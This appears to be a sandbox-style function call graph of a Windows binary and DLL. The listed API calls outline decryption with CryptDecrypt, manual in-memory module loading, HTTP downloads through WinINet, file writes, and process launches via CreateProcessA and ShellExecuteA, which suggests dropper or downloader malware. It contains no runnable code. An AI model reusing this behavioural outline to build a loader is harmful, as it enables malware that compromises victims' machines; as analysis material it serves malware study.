40076->39976 40077->39975 40078 4062b3 40087 402430 43 API calls 40078->40087 41185 4017d0 CoUninitialize 40079->41185 40080 406256 40089 402430 43 API calls 40080->40089 40085 4063f9 40081->40085 40086 40632b 40084->40086 40093 402360 39 API calls 40085->40093 41198 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40086->41198 40090 4062c3 40087->40090 40092 406266 40089->40092 41194 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40090->41194 40091 406334 40095 402360 39 API calls 40091->40095 41189 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40092->41189 40097 40640d 40093->40097 40099 40633c 40095->40099 40101 4064ce 40097->40101 41206 4072e0 53 API calls 2 library calls 40097->41206 40098 4062cc 40102 402360 39 API calls 40098->40102 41199 406fc0 53 API calls 2 library calls 40099->41199 40100 40626f 40104 402360 39 API calls 40100->40104 41214 407600 53 API calls 2 library calls 40101->41214 40106 4062d4 40102->40106 40108 406277 40104->40108 41195 408c10 43 API calls 40106->41195 40107 406341 40115 402430 43 API calls 40107->40115 41190 408c10 43 API calls 40108->41190 40110 40641a 40116 402430 43 API calls 40110->40116 40113 4064d8 40119 402430 43 API calls 40113->40119 40114 406283 40117 40686e 40114->40117 41252 402330 43 API calls 40114->41252 40118 406351 40115->40118 40120 40642a 40116->40120 40122 401770 41 API calls 40117->40122 41200 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40118->41200 40124 4064e8 40119->40124 41207 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40120->41207 40126 406881 40122->40126 40131 402360 39 API calls 40124->40131 40129 408380 53 API calls 40126->40129 40127 40635a 40130 402360 39 API calls 40127->40130 40128 406433 40132 402360 39 API calls 40128->40132 40133 40688a 40129->40133 40134 406362 40130->40134 40135 4064fc 40131->40135 40136 40643b 40132->40136 40144 402430 43 API calls 40133->40144 41201 407040 53 API calls 2 library calls 40134->41201 40138 4065e3 40135->40138 41215 407680 53 API calls 2 library calls 40135->41215 41208 407360 53 API calls 2 library calls 40136->41208 41225 407a20 53 API calls 2 library calls 40138->41225 40140 406367 40148 402430 43 API calls 40140->40148 40143 406440 40151 402430 43 API calls 40143->40151 40147 40689d 40144->40147 40145 4065ed 40153 402430 43 API calls 40145->40153 40146 406509 40154 402430 43 API calls 40146->40154 40149 408300 53 API calls 40147->40149 40150 406377 40148->40150 40152 4068a8 40149->40152 40159 402360 39 API calls 40150->40159 40155 406450 40151->40155 40162 402430 43 API calls 40152->40162 40156 4065fd 40153->40156 40157 406519 40154->40157 41209 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40155->41209 40170 402360 39 API calls 40156->40170 41216 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40157->41216 40164 40638b 40159->40164 40161 406459 40166 402360 39 API calls 40161->40166 40163 4068bb 40162->40163 40167 408260 53 API calls 40163->40167 40168 4063ac 40164->40168 40169 40638f 40164->40169 40165 406522 40171 402360 39 API calls 40165->40171 40172 406461 40166->40172 40173 4068c6 40167->40173 41203 407150 53 API calls 2 library calls 40168->41203 41202 4070d0 53 API calls 2 library calls 40169->41202 40175 406611 40170->40175 40176 40652a 40171->40176 41210 4073e0 53 API calls 2 library calls 40172->41210 40188 402430 43 API calls 40173->40188 40180 406693 40175->40180 40181 406615 40175->40181 41217 407700 53 API calls 2 library calls 40176->41217 40179 406394 40193 402430 43 API calls 40179->40193 41232 407c40 53 API calls 2 library calls 40180->41232 41226 407ab0 53 API calls 2 library calls 40181->41226 40183 4063b1 40194 402430 43 API calls 40183->40194 40184 406466 40191 402430 43 API calls 40184->40191 40187 40652f 40198 402430 43 API calls 40187->40198 40192 4068d9 40188->40192 40189 406698 40201 402430 43 API calls 40189->40201 40190 40661a 40202 402430 43 API calls 40190->40202 40195 406476 40191->40195 40196 408d60 43 API calls 40192->40196 40197 4063a4 40193->40197 40199 4063c1 40194->40199 40209 402360 39 API calls 40195->40209 40200 4068ee 40196->40200 41251 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40197->41251 40203 40653f 40198->40203 40213 402360 39 API calls 40199->40213 40204 408dc0 43 API calls 40200->40204 40205 4066a8 40201->40205 40206 40662a 40202->40206 41218 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40203->41218 40210 406906 40204->40210 40224 402360 39 API calls 40205->40224 41227 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40206->41227 40215 40648a 40209->40215 40216 408e70 43 API calls 40210->40216 40212 406548 40218 402360 39 API calls 40212->40218 40219 4063d5 40213->40219 40214 406855 40214->40114 40220 402360 39 API calls 40214->40220 40221 406498 40215->40221 40222 40648e 40215->40222 40223 40691b 40216->40223 40217 406633 40225 402360 39 API calls 40217->40225 40226 406550 40218->40226 40219->40114 41204 4071e0 53 API calls 2 library calls 40219->41204 40220->40114 41212 4074f0 53 API calls 2 library calls 40221->41212 41211 407470 53 API calls 2 library calls 40222->41211 40229 408dc0 43 API calls 40223->40229 40230 4066bc 40224->40230 40231 40663b 40225->40231 41219 407780 53 API calls 2 library calls 40226->41219 40235 406933 40229->40235 40236 4066c0 40230->40236 40237 40673e 40230->40237 41228 407b30 53 API calls 2 library calls 40231->41228 40234 40649d 40247 402430 43 API calls 40234->40247 40240 408e70 43 API calls 40235->40240 41233 407cd0 53 API calls 2 library calls 40236->41233 41239 407e50 53 API calls 2 library calls 40237->41239 40239 406555 40249 402430 43 API calls 40239->40249 40244 406948 40240->40244 40243 406640 40252 402430 43 API calls 40243->40252 40248 408dc0 43 API calls 40244->40248 40245 406743 40255 402430 43 API calls 40245->40255 40246 4066c5 40256 402430 43 API calls 40246->40256 40250 4064ad 40247->40250 40253 406565 40249->40253 40265 402360 39 API calls 40250->40265 40257 406650 40252->40257 41220 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40253->41220 40260 406753 40255->40260 40261 4066d5 40256->40261 41229 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40257->41229 40276 402360 39 API calls 40260->40276 41234 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40261->41234 40263 40656e 40264 402360 39 API calls 40263->40264 40269 406576 40264->40269 40270 4064c1 40265->40270 40268 406659 40273 402360 39 API calls 40268->40273 41221 407800 53 API calls 2 library calls 40269->41221 40270->40114 41213 407580 53 API calls 2 library calls 40270->41213 40272 4066de 40277 402360 39 API calls 40272->40277 40278 406661 40273->40278 40282 406767 40276->40282 40283 4066e6 40277->40283 41230 407bc0 53 API calls 2 library calls 40278->41230 40287 40676b 40282->40287 40288 4067be 40282->40288 41235 407d50 53 API calls 2 library calls 40283->41235 41240 407ee0 53 API calls 2 library calls 40287->41240 41245 408060 53 API calls 2 library calls 40288->41245 40290 4066eb 40294 406770 40304 402430 43 API calls 40294->40304 40296 4067c3 40307 402430 43 API calls 40296->40307 40309 406780 40304->40309 40436->40064 40437->40064 40440->38879 40441->38879 40442->38879 40444 409358 40443->40444 40447 4092ea __InternalCxxFrameHandler 40443->40447 41280 409590 43 API calls 4 library calls 40444->41280 40446 40936a 40446->38879 40447->38879 40449 401e70 40448->40449 40449->40449 40450 402730 43 API calls 40449->40450 40451 401e83 40450->40451 40452 402730 43 API calls 40451->40452 40453 401fc1 __InternalCxxFrameHandler 40452->40453 41281 40d0b0 40453->41281 40456 4020f9 40458 402198 40456->40458 40460 402169 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40456->40460 40457 4099d7 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 40459 40218d 40457->40459 40461 40cfaf 39 API calls 40458->40461 40459->38879 40460->40457 40462 40219d 40461->40462 40463 401e20 43 API calls 40462->40463 40464->38894 40466->38878 40467->38897 40468->38917 40469->38934 40470->38950 40471->38880 40472->38893 40473->38915 40474->38936 40475->38950 40476->38871 40477->38908 40478->38926 40479->38941 40480->38962 40481->38976 40482->39016 40483->39015 40484->39016 40485->38911 40486->38947 40487->38966 40488->38978 40489->38996 40490->39019 40491->39016 40492->39074 40493->38939 40494->38948 40495->38982 40496->39002 40497->39023 40498->39047 40499->39073 40500->39099 40501->39115 40502->39159 40503->39165 40504->38975 40505->38981 40506->39026 40507->39051 40508->39078 40509->39104 40510->39121 40511->39147 40512->39025 40513->39082 40514->39108 40515->39126 40516->39153 40517->39170 40518->39183 40519->39081 40520->39130 40521->39157 40522->39172 40523->39187 40524->39206 40525->39132 40526->39173 40527->39193 40528->39203 40529->39216 40530->39206 40531->39050 40532->38952 40533->39228 40534->39240 40536->39238 40537->39249 40538->39263 40539->39267 40540->39271 40542 41066b 21 API calls 40541->40542 40543 403c27 40542->40543 40545 4128be 40544->40545 40546 4128b8 40544->40546 40551 4128c2 40545->40551 40574 4135a5 6 API calls _unexpected 40545->40574 40573 413566 6 API calls _unexpected 40546->40573 40549 4128da 40550 4128e2 40549->40550 40549->40551 40575 413254 14 API calls 2 library calls 40550->40575 40552 412947 SetLastError 40551->40552 40555 405a88 Sleep 40552->40555 40556 412957 40552->40556 40554 4128ef 40557 4128f7 40554->40557 40558 412908 40554->40558 40555->38846 40586 4110c9 39 API calls _unexpected 40556->40586 40576 4135a5 6 API calls _unexpected 40557->40576 40577 4135a5 6 API calls _unexpected 40558->40577 40563 412905 40579 4132b1 40563->40579 40564 412914 40565 412918 40564->40565 40566 41292f 40564->40566 40578 4135a5 6 API calls _unexpected 40565->40578 40585 4126d0 14 API calls _unexpected 40566->40585 40570 41292c 40570->40552 40571 41293a 40572 4132b1 ___free_lconv_mon 14 API calls 40571->40572 40572->40570 40573->40545 40574->40549 40575->40554 40576->40563 40577->40564 40578->40563 40580 4132e6 40579->40580 40581 4132bc RtlFreeHeap 40579->40581 40580->40570 40581->40580 40582 4132d1 GetLastError 40581->40582 40583 4132de __dosmaperr 40582->40583 40587 40d09d 14 API calls __dosmaperr 40583->40587 40585->40571 40587->40580 40588->39278 40589->39288 40590->39297 40591->39300 40592->39302 40593->39324 40594->39326 40595->39328 40596->39334 40597->39337 40598->39330 40599->39345 40600->39347 40601->39340 40602->39356 40604 409133 40603->40604 40605 4092bd 40604->40605 40606 4091fd 40604->40606 40610 409138 __InternalCxxFrameHandler 40604->40610 40622 4015d0 43 API calls 3 library calls 40605->40622 40611 409232 40606->40611 40612 409258 40606->40612 40608 4092c2 40623 401530 41 API calls 3 library calls 40608->40623 40610->39359 40611->40608 40613 40923d 40611->40613 40619 40924a __InternalCxxFrameHandler 40612->40619 40621 401530 41 API calls 4 library calls 40612->40621 40620 401530 41 API calls 4 library calls 40613->40620 40615 40cfaf 39 API calls 40617 4092cc 40615->40617 40618 409243 40618->40615 40618->40619 40619->39359 40620->40618 40621->40619 40622->40608 40623->40618 40624->39370 40625->39376 40626->39365 40627->39370 40632 40248e __InternalCxxFrameHandler 40628->40632 40633 4024b4 40628->40633 40629 402594 40859 4015d0 43 API calls 3 library calls 40629->40859 40631 402599 40860 401530 41 API calls 3 library calls 40631->40860 40632->39389 40633->40629 40635 4024ef 40633->40635 40638 402523 40633->40638 40635->40631 40857 401530 41 API calls 4 library calls 40635->40857 40637 40259e 40641 40250f __InternalCxxFrameHandler 40638->40641 40858 401530 41 API calls 4 library calls 40638->40858 40640 40cfaf 39 API calls 40640->40629 40641->40640 40642 402576 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40641->40642 40642->39389 40644 4036fa GetLastError CryptReleaseContext 40643->40644 40645 40363e CryptCreateHash 40643->40645 40646 403844 40644->40646 40645->40644 40647 403662 40645->40647 40648 40386a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40646->40648 40650 403892 40646->40650 40651 409b4a 41 API calls 40647->40651 40649 4099d7 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 40648->40649 40652 40388e 40649->40652 40654 40cfaf 39 API calls 40650->40654 40653 40369a 40651->40653 40652->39418 40861 40fcdf 40653->40861 40656 403897 40654->40656 40656->39418 40658 4036d6 CryptDeriveKey 40658->40644 40660 403715 40658->40660 40659 4036c8 GetLastError 40659->40646 40661 40fb0d ___std_exception_copy 15 API calls 40660->40661 40662 40371b __InternalCxxFrameHandler 40661->40662 40663 409b4a 41 API calls 40662->40663 40666 40373a __InternalCxxFrameHandler 40663->40666 40664 403838 CryptDestroyKey 40664->40646 40665 4037ac CryptDecrypt 40665->40664 40665->40666 40666->40664 40666->40665 40668 402ee0 SetLastError 40667->40668 40669 402f08 40667->40669 40916 4029f0 70 API calls 40668->40916 40671 402f12 40669->40671 40673 402f49 SetLastError 40669->40673 40688 402f71 40669->40688 40917 4029f0 70 API calls 40671->40917 40672 402ef2 40674 4099d7 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 40672->40674 40918 4029f0 70 API calls 40673->40918 40677 402f04 40674->40677 40677->39418 40678 402f1c SetLastError 40681 4099d7 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 40678->40681 40679 402f5b 40680 4099d7 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 40679->40680 40682 402f6d 40680->40682 40684 402f39 40681->40684 40682->39418 40683 402fe7 GetNativeSystemInfo 40683->40671 40685 403016 VirtualAlloc 40683->40685 40684->39418 40686 403030 VirtualAlloc 40685->40686 40687 403056 HeapAlloc 40685->40687 40686->40687 40689 403042 40686->40689 40693 403077 VirtualFree 40687->40693 40694 40308b 40687->40694 40688->40671 40688->40683 40919 4029f0 70 API calls 40689->40919 40692 40304c 40692->40687 40693->40694 40695 4030d7 SetLastError 40694->40695 40696 40316f VirtualAlloc 40694->40696 40697 4030df 40695->40697 40705 40318a __InternalCxxFrameHandler _unexpected 40696->40705 40920 40fab8 40697->40920 40699 403132 HeapFree 40707 4099d7 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 40699->40707 40702 40330c 40702->40697 40909 402b50 40702->40909 40703 40fab8 __freea 14 API calls 40703->40699 40705->40695 40705->40697 40706 40326a 40705->40706 40900 402e30 VirtualAlloc 40705->40900 40901 402cd0 40706->40901 40709 40316b 40707->40709 40709->39418 40710 40331b 40710->40697 40713 403323 40710->40713 40711 4033aa 40714 4099d7 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 40711->40714 40712 40335a 40715 403394 40712->40715 40716 403365 40712->40716 40713->40711 40713->40712 40718 4033c0 40714->40718 40717 4099d7 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 40715->40717 40720 4099d7 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 40716->40720 40719 4033a6 40717->40719 40718->39418 40719->39418 40721 403390 40720->40721 40721->39418 40724 100010ad 40723->40724 40725 100010bd CoUninitialize 40724->40725 40940 10005956 GetSystemTimeAsFileTime 40726->40940 40728 10001f48 40942 100059d5 40728->40942 40730 10001f4f 40945 10001523 40730->40945 40732 10002174 40733 100010a3 CoUninitialize 40732->40733 40735 10002188 40733->40735 40987 100026ff 40735->40987 40737 10002025 40975 10001cdd 44 API calls __EH_prolog3_GS 40737->40975 40738 1000219b 40738->39489 40740 1000202e 40768 10002164 40740->40768 40976 100059b4 27 API calls _unexpected 40740->40976 40742 10001bb9 15 API calls 40744 10002172 40742->40744 40743 10002040 40977 10001c33 29 API calls 40743->40977 40744->40732 40746 10002052 40978 10002493 17 API calls __InternalCxxFrameHandler 40746->40978 40748 1000205f 40979 10002230 17 API calls __InternalCxxFrameHandler 40748->40979 40750 10002079 40980 10002230 17 API calls __InternalCxxFrameHandler 40750->40980 40752 1000209f 40981 1000219f 17 API calls __InternalCxxFrameHandler 40752->40981 40754 100020a9 40982 10001bb9 40754->40982 40757 10001bb9 15 API calls 40758 100020bb 40757->40758 40759 10001bb9 15 API calls 40758->40759 40760 100020c4 40759->40760 40986 10001725 8 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 40760->40986 40762 100020df 40763 10002100 CreateProcessA 40762->40763 40764 10002135 40763->40764 40765 1000213c ShellExecuteA 40763->40765 40764->40765 40766 1000215b 40764->40766 40765->40766 40767 10001bb9 15 API calls 40766->40767 40767->40768 40768->40742 40769->39389 40770->39389 40771->39389 40772->39418 40773->39418 40774->39418 40777->39420 40778->39420 40779->39420 40780->39477 40782->39462 40783->39480 40784->39503 40785->39520 40786->39536 40787->39463 40788->39476 40789->39501 40790->39522 40791->39536 40792->39455 40793->39493 40794->39512 40795->39527 40796->39548 40797->39562 40798->39602 40799->39601 40800->39602 40801->39496 40802->39533 40803->39552 40804->39564 40805->39582 40806->39605 40807->39602 40808->39660 40809->39525 40810->39534 40811->39568 40812->39588 40813->39609 40814->39633 40815->39659 40816->39685 40817->39701 40818->39745 40819->39751 40820->39561 40821->39567 40822->39612 40823->39637 40824->39664 40825->39690 40826->39707 40827->39733 40828->39611 40829->39668 40830->39694 40831->39712 40832->39739 40833->39756 40834->39769 40835->39667 40836->39716 40837->39743 40838->39758 40839->39773 40840->39792 40841->39718 40842->39759 40843->39779 40844->39789 40845->39802 40846->39792 40847->39636 40848->39538 40857->40641 40858->40641 40859->40631 40860->40637 40862 40fcf2 ___std_exception_copy 40861->40862 40867 40fb18 40862->40867 40868 40fb4e 40867->40868 40869 40fb62 40868->40869 40870 40fb86 40868->40870 40882 40fb7b 40868->40882 40892 40cf22 39 API calls ___std_exception_copy 40869->40892 40872 40fb96 40870->40872 40893 40f660 39 API calls 2 library calls 40870->40893 40874 40fbc6 40872->40874 40875 40fba8 40872->40875 40877 40fbd4 40874->40877 40878 40fc8c 40874->40878 40894 414d57 5 API calls ___scrt_uninitialize_crt 40875->40894 40877->40882 40895 414cbe MultiByteToWideChar ___scrt_uninitialize_crt 40877->40895 40878->40882 40897 414cbe MultiByteToWideChar ___scrt_uninitialize_crt 40878->40897 40881 40fc0a 40881->40882 40883 40fc15 GetLastError 40881->40883 40886 40ccdb 40882->40886 40883->40882 40885 40fc35 40883->40885 40885->40882 40896 414cbe MultiByteToWideChar ___scrt_uninitialize_crt 40885->40896 40887 40cce7 40886->40887 40888 40ccfe 40887->40888 40898 40cd86 39 API calls 2 library calls 40887->40898 40891 4036ac CryptHashData 40888->40891 40899 40cd86 39 API calls 2 library calls 40888->40899 40891->40658 40891->40659 40892->40882 40893->40872 40894->40882 40895->40881 40896->40882 40897->40882 40898->40888 40899->40891 40900->40705 40902 402e22 40901->40902 40904 402cf0 40901->40904 40902->40702 40903 402e11 SetLastError 40903->40702 40904->40902 40904->40903 40905 402df4 SetLastError 40904->40905 40907 402dd5 SetLastError 40904->40907 40905->40702 40907->40702 40913 402b83 40909->40913 40910 402ca2 40911 402a20 52 API calls 40910->40911 40912 402cb4 40911->40912 40912->40710 40913->40910 40915 402c99 40913->40915 40923 402a20 40913->40923 40915->40710 40916->40672 40917->40678 40918->40679 40919->40692 40921 4132b1 ___free_lconv_mon 14 API calls 40920->40921 40922 4030fe 40921->40922 40922->40699 40922->40703 40924 402a39 40923->40924 40933 402a75 40923->40933 40926 402a8e VirtualProtect 40924->40926 40929 402a44 40924->40929 40925 4099d7 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 40927 402a8a 40925->40927 40928 402ad2 GetLastError FormatMessageA 40926->40928 40926->40933 40927->40913 40930 402af7 40928->40930 40929->40933 40938 402e50 VirtualFree 40929->40938 40930->40930 40931 402afe LocalAlloc 40930->40931 40939 4029b0 44 API calls 40931->40939 40933->40925 40934 402b21 OutputDebugStringA LocalFree LocalFree 40935 4099d7 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 40934->40935 40936 402b47 40935->40936 40936->40913 40938->40933 40939->40934 40941 10005988 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 40940->40941 40941->40728 40994 10006e9c GetLastError 40942->40994 40946 1000152f __EH_prolog3_GS 40945->40946 41027 1000184b 40946->41027 40948 10001593 41031 1000190a 40948->41031 40950 100015ff 41036 1000179a 40950->41036 40951 10001541 40951->40948 40958 1000179a 17 API calls 40951->40958 40953 1000160d 41041 10005939 40953->41041 40956 10001650 InternetSetOptionA InternetConnectA 40960 10001692 HttpOpenRequestA 40956->40960 40961 100016e8 InternetCloseHandle 40956->40961 40957 100016eb 40959 10001704 40957->40959 41090 10001bdc 15 API calls 40957->41090 40958->40948 40963 10001bb9 15 API calls 40959->40963 40964 100016e2 InternetCloseHandle 40960->40964 40965 100016bc 40960->40965 40961->40957 40966 1000171b 40963->40966 40964->40961 41044 100010c7 40965->41044 41091 1000e8a5 40966->41091 40971 100016d3 41058 10001175 40971->41058 40972 100016df InternetCloseHandle 40972->40964 40975->40740 40976->40743 40977->40746 40978->40748 40979->40750 40980->40752 40981->40754 40983 10001bc4 40982->40983 40984 10001bcc 40982->40984 41134 10001bdc 15 API calls 40983->41134 40984->40757 40986->40762 40988 10002707 40987->40988 40989 10002708 IsProcessorFeaturePresent 40987->40989 40988->40738 40991 10002b1c 40989->40991 41135 10002adf SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 40991->41135 40993 10002bff 40993->40738 40995 10006eb3 40994->40995 40996 10006eb9 40994->40996 41019 10007580 6 API calls __dosmaperr 40995->41019 41000 10006ebf SetLastError 40996->41000 41020 100075bf 6 API calls __dosmaperr 40996->41020 40999 10006ed7 40999->41000 41001 10006edb 40999->41001 41007 10006f53 41000->41007 41008 100059df 41000->41008 41021 10007aa7 12 API calls __dosmaperr 41001->41021 41004 10006ee7 41005 10006f06 41004->41005 41006 10006eef 41004->41006 41023 100075bf 6 API calls __dosmaperr 41005->41023 41022 100075bf 6 API calls __dosmaperr 41006->41022 41026 10006928 27 API calls __InternalCxxFrameHandler 41007->41026 41008->40730 41013 10006f12 41014 10006f16 41013->41014 41015 10006f27 41013->41015 41024 100075bf 6 API calls __dosmaperr 41014->41024 41025 10006c9e EnterCriticalSection LeaveCriticalSection __dosmaperr 41015->41025 41018 10006efd 41018->41000 41019->40996 41020->40999 41021->41004 41022->41018 41023->41013 41024->41018 41025->41018 41028 10001868 41027->41028 41029 1000190a 17 API calls 41028->41029 41030 1000187c 41029->41030 41030->40951 41032 10001978 41031->41032 41035 10001920 __InternalCxxFrameHandler 41031->41035 41094 10001a59 17 API calls std::_Xinvalid_argument 41032->41094 41035->40950 41037 100017b3 __InternalCxxFrameHandler 41036->41037 41038 100017eb 41036->41038 41037->40953 41095 10001884 17 API calls 41038->41095 41096 100070ee 41041->41096 41045 100010d3 __EH_prolog3_GS 41044->41045 41046 1000184b 17 API calls 41045->41046 41047 100010e3 HttpAddRequestHeadersA 41046->41047 41122 100017f1 41047->41122 41049 10001112 HttpAddRequestHeadersA 41050 100017f1 17 API calls 41049->41050 41051 10001132 HttpAddRequestHeadersA 41050->41051 41052 100017f1 17 API calls 41051->41052 41053 10001152 HttpAddRequestHeadersA 41052->41053 41054 10001bb9 15 API calls 41053->41054 41055 1000116d 41054->41055 41056 1000e8a5 5 API calls 41055->41056 41057 10001172 HttpSendRequestA 41056->41057 41057->40971 41057->40972 41059 10001184 __EH_prolog3_GS 41058->41059 41060 100011c5 InternetSetFilePointer 41059->41060 41061 100011e3 InternetReadFile 41060->41061 41063 1000121d __InternalCxxFrameHandler 41061->41063 41062 10001260 41064 1000127d HttpQueryInfoA 41062->41064 41063->41061 41063->41062 41065 100012a6 CoCreateInstance 41064->41065 41066 1000150a 41064->41066 41065->41066 41067 100012d8 41065->41067 41068 1000e8a5 5 API calls 41066->41068 41067->41066 41070 1000184b 17 API calls 41067->41070 41069 10001520 41068->41069 41069->40972 41071 100012f7 41070->41071 41127 10001006 20 API calls 41071->41127 41073 1000130c 41074 10001bb9 15 API calls 41073->41074 41081 1000134f 41074->41081 41075 1000149d 41131 10005926 12 API calls __dosmaperr 41075->41131 41076 10001427 __InternalCxxFrameHandler 41076->41075 41078 100014ae __InternalCxxFrameHandler 41076->41078 41080 100014aa 41076->41080 41078->41066 41079 100014a2 41133 1000584c 15 API calls __strnicoll 41079->41133 41080->41078 41132 10005926 12 API calls __dosmaperr 41080->41132 41081->41076 41081->41078 41084 10001456 41081->41084 41085 10001449 41081->41085 41084->41076 41129 10005926 12 API calls __dosmaperr 41084->41129 41128 10005926 12 API calls __dosmaperr 41085->41128 41087 1000144e 41130 1000584c 15 API calls __strnicoll 41087->41130 41090->40959 41092 100026ff __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 41091->41092 41093 10001722 41092->41093 41093->40732 41093->40737 41099 10007102 41096->41099 41097 10007106 41114 10001629 InternetOpenA 41097->41114 41115 10005926 12 API calls __dosmaperr 41097->41115 41099->41097 41101 10007140 41099->41101 41099->41114 41100 10007130 41116 1000584c 15 API calls __strnicoll 41100->41116 41117 100069d1 27 API calls 2 library calls 41101->41117 41104 1000714c 41105 10007156 41104->41105 41109 1000716d 41104->41109 41118 1000a31e 15 API calls 2 library calls 41105->41118 41107 100071ef 41107->41114 41119 10005926 12 API calls __dosmaperr 41107->41119 41108 10007244 41108->41114 41121 10005926 12 API calls __dosmaperr 41108->41121 41109->41107 41109->41108 41112 10007238 41120 1000584c 15 API calls __strnicoll 41112->41120 41114->40956 41114->40957 41115->41100 41116->41114 41117->41104 41118->41114 41119->41112 41120->41114 41121->41114 41123 100017ff 41122->41123 41123->41123 41124 1000180d __InternalCxxFrameHandler 41123->41124 41126 1000188f 17 API calls __InternalCxxFrameHandler 41123->41126 41124->41049 41126->41124 41127->41073 41128->41087 41129->41087 41130->41076 41131->41079 41132->41079 41133->41078 41134->40984 41135->40993 41137 4128a2 _unexpected 39 API calls 41136->41137 41138 410686 41137->41138 41138->39872 41261 408a70 41139->41261 41141 403d02 41141->39872 41142 410681 39 API calls 41143 403ca2 41142->41143 41143->41141 41143->41142 41275 408fb0 43 API calls 3 library calls 41143->41275 41146 40226b 41145->41146 41147 40220d 41145->41147 41149 4099d7 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 41146->41149 41147->41146 41148 402213 CreateFileA 41147->41148 41148->41146 41150 402233 WriteFile CloseHandle 41148->41150 41151 402279 41149->41151 41152 4099d7 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 41150->41152 41151->39912 41153 402265 41152->41153 41153->39912 41154->39881 41155->39887 41156->39882 41157->39894 41158->39900 41159->39896 41160->39932 41161->39938 41162->39934 41163->39951 41164->39959 41165->39953 41166->39987 41167->40000 41168->39990 41169->40026 41170->40033 41171->40039 41172->40021 41173->39909 41174->39909 41175->39909 41176->39968 41177->39968 41178->39968 41181->39962 41182->39962 41183->39962 41184->40051 41186->40032 41187->40054 41188->40080 41189->40100 41190->40114 41191->40034 41192->40050 41193->40078 41194->40098 41195->40114 41196->40018 41197->40068 41198->40091 41199->40107 41200->40127 41201->40140 41202->40179 41203->40183 41204->40179 41205->40071 41206->40110 41207->40128 41208->40143 41209->40161 41210->40184 41211->40179 41212->40234 41213->40101 41214->40113 41215->40146 41216->40165 41217->40187 41218->40212 41219->40239 41220->40263 41225->40145 41226->40190 41227->40217 41228->40243 41229->40268 41232->40189 41233->40246 41234->40272 41235->40290 41239->40245 41240->40294 41245->40296 41251->40214 41252->40117 41262 408b74 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41261->41262 41265 408a8b 41261->41265 41262->41143 41263 408b0b __InternalCxxFrameHandler 41263->41262 41274 40cfaf 39 API calls 41263->41274 41264 408c01 41278 4015d0 43 API calls 3 library calls 41264->41278 41265->41262 41265->41263 41265->41264 41268 408afa 41265->41268 41270 408b21 41265->41270 41267 408c06 41279 401530 41 API calls 3 library calls 41267->41279 41268->41267 41276 401530 41 API calls 4 library calls 41268->41276 41270->41263 41277 401530 41 API calls 4 library calls 41270->41277 41271 408c0b 41274->41264 41275->41143 41276->41263 41277->41263 41278->41267 41279->41271 41280->40446 41284 412b8d 41281->41284 41287 412ba1 41284->41287 41285 412ba5 41302 40200e InternetOpenA 41285->41302 41303 40d09d 14 API calls __dosmaperr 41285->41303 41287->41285 41289 412bdf 41287->41289 41287->41302 41288 412bcf 41304 40cf9f 39 API calls ___std_exception_copy 41288->41304 41305 40d0cd 39 API calls 2 library calls 41289->41305 41292 412beb 41293 412bf5 41292->41293 41298 412c0c 41292->41298 41306 4193d9 39 API calls 2 library calls 41293->41306 41295 412cee 41295->41302 41309 40d09d 14 API calls __dosmaperr 41295->41309 41297 412c96 41297->41302 41307 40d09d 14 API calls __dosmaperr 41297->41307 41298->41295 41298->41297 41300 412ce2 41308 40cf9f 39 API calls ___std_exception_copy 41300->41308 41302->40456 41303->41288 41304->41302 41305->41292 41306->41302 41307->41300 41308->41302 41309->41302 41311 4104cc 41310->41311 41312 4104de 41310->41312 41337 40a69e GetModuleHandleW 41311->41337 41322 410330 41312->41322 41316 4104d1 41316->41312 41338 410580 GetModuleHandleExW 41316->41338 41317 40a1e4 41317->38826 41323 41033c __FrameHandler3::FrameUnwindToState 41322->41323 41344 41088b EnterCriticalSection 41323->41344 41325 410346 41345 4103b7 41325->41345 41327 410353 41349 410371 41327->41349 41330 410536 41354 410567 41330->41354 41332 410540 41333 410554 41332->41333 41334 410544 GetCurrentProcess TerminateProcess 41332->41334 41335 410580 _unexpected 3 API calls 41333->41335 41334->41333 41336 41055c ExitProcess 41335->41336 41337->41316 41339 4105e0 41338->41339 41340 4105bf GetProcAddress 41338->41340 41341 4105e6 